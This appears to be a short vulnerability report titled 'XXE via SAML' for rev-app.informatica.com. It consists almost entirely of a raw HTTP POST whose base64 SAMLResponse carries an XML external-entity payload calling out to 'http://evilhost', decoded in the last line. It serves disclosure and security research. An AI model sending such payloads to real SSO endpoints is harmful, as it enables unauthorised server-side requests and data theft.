[rev-app.informatica.com] - XXE via SAML

Request: `POST /sso HTTP/1.1` `Host: rev-app.informatica.com` `Connection: keep-alive` `Content-Length: 8669` `Cache-Control: max-age=0` `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8` `Origin: https://infapassport.okta.com` `Upgrade-Insecure-Requests: 1` `User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36` `Content-Type: application/x-www-form-urlencoded` `Referer: https://infapassport.okta.com/app/template_saml/kwtbgh4jLAZPMXLQUNMU/sso/saml` `Accept-Encoding: gzip, deflate` `Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4` `SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgZm9vIFsgPCFFTlRJVFkgJSBhc2QgU1lTVEVNICJodHRwOi8vZXZpbGhvc3QiPiAlYXNkO10%2BPHNhbWwycDpSZXNwb25zZSB4bWxuczpzYW1sMnA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgRGVzdGluYXRpb249Imh0dHBzOi8vcmV2LWFwcC5pbmZvcm1hdGljYS5jb20vc3NvIiBJRD0iaWQyOTA5ODg2NzYyNzM5OTM1NDEyMDk2MjY1NSIgSXNzdWVJbnN0YW50PSIyMDE1LTEyLTI1VDEyOjQ4OjMwLjY3MloiIFZlcnNpb249IjIuMCIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIj48c2FtbDI6SXNzdWVyIHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpuYW1laWQtZm9ybWF0OmVudGl0eSI%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzM5OTM1NDEyMDk2MjY1NSI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPm9aV0EzYUVwRTdXeXhUUjdiRFllNDFieGVXaz08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BZ0hwc0Z1aURmSE9ZOTkzY0IrVkRvdlQxNDg3T1U1Y1ZmTmxldlN3VXFiK3I5UTJGR00xWDFFczJNT2x1MXBudXQzU3V4dGNzcXU3OWdqb0ZvVW9RdGFnNllFNjhEdGtwR1d5S2RYUW1sZU9ZM0lkQ21NcGk4cFhXdnZJTnV2WDBiZHp6V1ZXTVlqTXplbDdPTFBXL0FZMDdETGl5ellkT0dYTmtKemlZcVZRPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJQ296Q0NBZ3lnQXdJQkFnSUdBVDN3UmxIdE1BMEdDU3FHU0liM0RRRUJCUVVBTUlHVU1Rc3dDUVlEVlFRR0V3SlZVekVUTUJFRwpBMVVFQ0F3S1EyRnNhV1p2Y201cFlURVdNQlFHQTFVRUJ3d05VMkZ1SUVaeVlXNWphWE5qYnpFTk1Bc0dBMVVFQ2d3RVQydDBZVEVVCk1CSUdBMVVFQ3d3TFUxTlBVSEp2ZG1sa1pYSXhGVEFUQmdOVkJBTU1ER2x1Wm1Gd1lYTnpjRzl5ZERFY01Cb0dDU3FHU0liM0RRRUoKQVJZTmFXNW1iMEJ2YTNSaExtTnZiVEFlRncweE16QTBNRGt4T1RJNE16TmFGdzAwTXpBME1Ea3hPVEk1TXpOYU1JR1VNUXN3Q1FZRApWUVFHRXdKVlV6RVRNQkVHQTFVRUNBd0tRMkZzYVdadmNtNXBZVEVXTUJRR0ExVUVCd3dOVTJGdUlFWnlZVzVqYVhOamJ6RU5NQXNHCkExVUVDZ3dFVDJ0MFlURVVNQklHQTFVRUN3d0xVMU5QVUhKdmRtbGtaWEl4RlRBVEJnTlZCQU1NREdsdVptRndZWE56Y0c5eWRERWMKTUJvR0NTcUdTSWIzRFFFSkFSWU5hVzVtYjBCdmEzUmhMbU52YlRDQm56QU5CZ2txaGtpRzl3MEJBUUVGQUFPQmpRQXdnWWtDZ1lFQQprOFUyUnY1S2lmMzE2aVFkRWVaU25JY3d4amNNRDkzcUpRL1BQbkJDc1A4MDFkbThEOGxxbHBmcHg0Mk82SkxwR0pycSt6UExhZURiCmo1TFJqak9GQjFWR3Z4dEM2eGlpY3o2SXZTS1FVQXFxOCtpL2hsU293SU5zdS9TOWswd0hDaEplVi9tYnBMbVRWeXRRSlYrdVNRM1QKemdjcTNWQzU5VXR2djNFNUJ4OENBd0VBQVRBTkJna3Foa2lHOXcwQkFRVUZBQU9CZ1FBKzBITi9sSkduTWd4SWVwVGJ4LzZqYjNhWQpPNWpyK3IraWFvL1BwL1dlNkxTL2t5MkovdkpGSnZ5TjNMcjBKcFVaeW4zQUZUc3Y4ZFNURmxjeTN2blZBUjdkdnhaY1dHTGlwbzRECm5ZQ3NGNmYvcFgwRDFHSmgyaUZxL3ArK0dqbldIRzZ0Z3ZkUm93akdqVkM3MTFrTy9rUHJIa1ZleDFTNGhlUkxCUVM2Mnc9PTwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1sMnA6U3RhdHVzIHhtbG5zOnNhbWwycD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIj48c2FtbDJwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbDJwOlN0YXR1cz48c2FtbDI6QXNzZXJ0aW9uIHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0iaWQyOTA5ODg2NzYyNzQ3NjQxMzUwNDEzNDk3MiIgSXNzdWVJbnN0YW50PSIyMDE1LTEyLTI1VDEyOjQ4OjMwLjY3MloiIFZlcnNpb249IjIuMCIgeG1sbnM6eHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIj48c2FtbDI6SXNzdWVyIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOm5hbWVpZC1mb3JtYXQ6ZW50aXR5IiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BaHR0cDovL3d3dy5va3RhLmNvbS9rd3RiZ2g0akxBWlBNWExRVU5NVTwvc2FtbDI6SXNzdWVyPjxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BPGRzOlNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSIvPjxkczpSZWZlcmVuY2UgVVJJPSIjaWQyOTA5ODg2NzYyNzQ3NjQxMzUwNDEzNDk3MiI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI%2BPGVjOkluY2x1c2l2ZU5hbWVzcGFjZXMgeG1sbnM6ZWM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIgUHJlZml4TGlzdD0ieHMiLz48L2RzOlRyYW5zZm9ybT48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPnYzMDhxcFZNZ3k0cTNIVk5BMmgyTmxzREE0OD08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BUE5HMUllTXI2MGlkSUkvNFIrcWhSNXFzVUZVM05NYkRzOUFtTzdIZ0U2UFprMFg0VnJlbHJPTjRZeXkwdzY0dUhnQjUvQUpyRTREZ1YyOVV1Vi9NSmg4ZVByK1pRUlpRR09nZFphZTljcGM5VHBYZVRsWVF1T2dleVcyM25HZDRLeHBtK0ZkVU1aaldTY0pYditrYjQrQ2Q5eElmKzRCTDE5MnJ5elBEc1cwPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJQ296Q0NBZ3lnQXdJQkFnSUdBVDN3UmxIdE1BMEdDU3FHU0liM0RRRUJCUVVBTUlHVU1Rc3dDUVlEVlFRR0V3SlZVekVUTUJFRwpBMVVFQ0F3S1EyRnNhV1p2Y201cFlURVdNQlFHQTFVRUJ3d05VMkZ1SUVaeVlXNWphWE5qYnpFTk1Bc0dBMVVFQ2d3RVQydDBZVEVVCk1CSUdBMVVFQ3d3TFUxTlBVSEp2ZG1sa1pYSXhGVEFUQmdOVkJBTU1ER2x1Wm1Gd1lYTnpjRzl5ZERFY01Cb0dDU3FHU0liM0RRRUoKQVJZTmFXNW1iMEJ2YTNSaExtTnZiVEFlRncweE16QTBNRGt4T1RJNE16TmFGdzAwTXpBME1Ea3hPVEk1TXpOYU1JR1VNUXN3Q1FZRApWUVFHRXdKVlV6RVRNQkVHQTFVRUNBd0tRMkZzYVdadmNtNXBZVEVXTUJRR0ExVUVCd3dOVTJGdUlFWnlZVzVqYVhOamJ6RU5NQXNHCkExVUVDZ3dFVDJ0MFlURVVNQklHQTFVRUN3d0xVMU5QVUhKdmRtbGtaWEl4RlRBVEJnTlZCQU1NREdsdVptRndZWE56Y0c5eWRERWMKTUJvR0NTcUdTSWIzRFFFSkFSWU5hVzVtYjBCdmEzUmhMbU52YlRDQm56QU5CZ2txaGtpRzl3MEJBUUVGQUFPQmpRQXdnWWtDZ1lFQQprOFUyUnY1S2lmMzE2aVFkRWVaU25JY3d4amNNRDkzcUpRL1BQbkJDc1A4MDFkbThEOGxxbHBmcHg0Mk82SkxwR0pycSt6UExhZURiCmo1TFJqak9GQjFWR3Z4dEM2eGlpY3o2SXZTS1FVQXFxOCtpL2hsU293SU5zdS9TOWswd0hDaEplVi9tYnBMbVRWeXRRSlYrdVNRM1QKemdjcTNWQzU5VXR2djNFNUJ4OENBd0VBQVRBTkJna3Foa2lHOXcwQkFRVUZBQU9CZ1FBKzBITi9sSkduTWd4SWVwVGJ4LzZqYjNhWQpPNWpyK3IraWFvL1BwL1dlNkxTL2t5MkovdkpGSnZ5TjNMcjBKcFVaeW4zQUZUc3Y4ZFNURmxjeTN2blZBUjdkdnhaY1dHTGlwbzRECm5ZQ3NGNmYvcFgwRDFHSmgyaUZxL3ArK0dqbldIRzZ0Z3ZkUm93akdqVkM3MTFrTy9rUHJIa1ZleDFTNGhlUkxCUVM2Mnc9PTwvZHM6WDUwOUNlcnRpZmljYXRlPjwvZHM6WDUwOURhdGE%2BPC9kczpLZXlJbmZvPjwvZHM6U2lnbmF0dXJlPjxzYW1sMjpTdWJqZWN0IHhtbG5zOnNhbWwyPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIj48c2FtbDI6TmFtZUlEIEZvcm1hdD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6MS4xOm5hbWVpZC1mb3JtYXQ6ZW1haWxBZGRyZXNzIj55YXJiYWJpbkBnbWFpbC5jb208L3NhbWwyOk5hbWVJRD48c2FtbDI6U3ViamVjdENvbmZpcm1hdGlvbiBNZXRob2Q9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjbTpiZWFyZXIiPjxzYW1sMjpTdWJqZWN0Q29uZmlybWF0aW9uRGF0YSBOb3RPbk9yQWZ0ZXI9IjIwMTUtMTItMjVUMTI6NTM6MzAuNjczWiIgUmVjaXBpZW50PSJodHRwczovL3Jldi1hcHAuaW5mb3JtYXRpY2EuY29tL3NzbyIvPjwvc2FtbDI6U3ViamVjdENvbmZpcm1hdGlvbj48L3NhbWwyOlN1YmplY3Q%2BPHNhbWwyOkNvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDE1LTEyLTI1VDEyOjQzOjMwLjY3M1oiIE5vdE9uT3JBZnRlcj0iMjAxNS0xMi0yNVQxMjo1MzozMC42NzNaIiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPHNhbWwyOkF1ZGllbmNlPmh0dHBzOi8vcmV2LWFwcC5pbmZvcm1hdGljYS5jb20vc3NvPC9zYW1sMjpBdWRpZW5jZT48L3NhbWwyOkF1ZGllbmNlUmVzdHJpY3Rpb24%2BPC9zYW1sMjpDb25kaXRpb25zPjxzYW1sMjpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTUtMTItMjVUMTI6NDg6MzAuNjcyWiIgU2Vzc2lvbkluZGV4PSJpZDE0NTEwNDc3MTA2NzIuNjQ0NjAwMjU2IiB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF1dGhuQ29udGV4dD48c2FtbDI6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmRQcm90ZWN0ZWRUcmFuc3BvcnQ8L3NhbWwyOkF1dGhuQ29udGV4dENsYXNzUmVmPjwvc2FtbDI6QXV0aG5Db250ZXh0Pjwvc2FtbDI6QXV0aG5TdGF0ZW1lbnQ%2BPHNhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudCB4bWxuczpzYW1sMj0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFzc2VydGlvbiI%2BPHNhbWwyOkF0dHJpYnV0ZSBOYW1lPSJSb2xlIiBOYW1lRm9ybWF0PSJucyI%2BPHNhbWwyOkF0dHJpYnV0ZVZhbHVlIHhtbG5zOnhzPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeHNpOnR5cGU9InhzOnN0cmluZyI%2BYWxsPC9zYW1sMjpBdHRyaWJ1dGVWYWx1ZT48L3NhbWwyOkF0dHJpYnV0ZT48L3NhbWwyOkF0dHJpYnV0ZVN0YXRlbWVudD48L3NhbWwyOkFzc2VydGlvbj48L3NhbWwycDpSZXNwb25zZT4%3D&RelayState=` Where SAMLResponse XML in base64 with XXE payload: `<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>`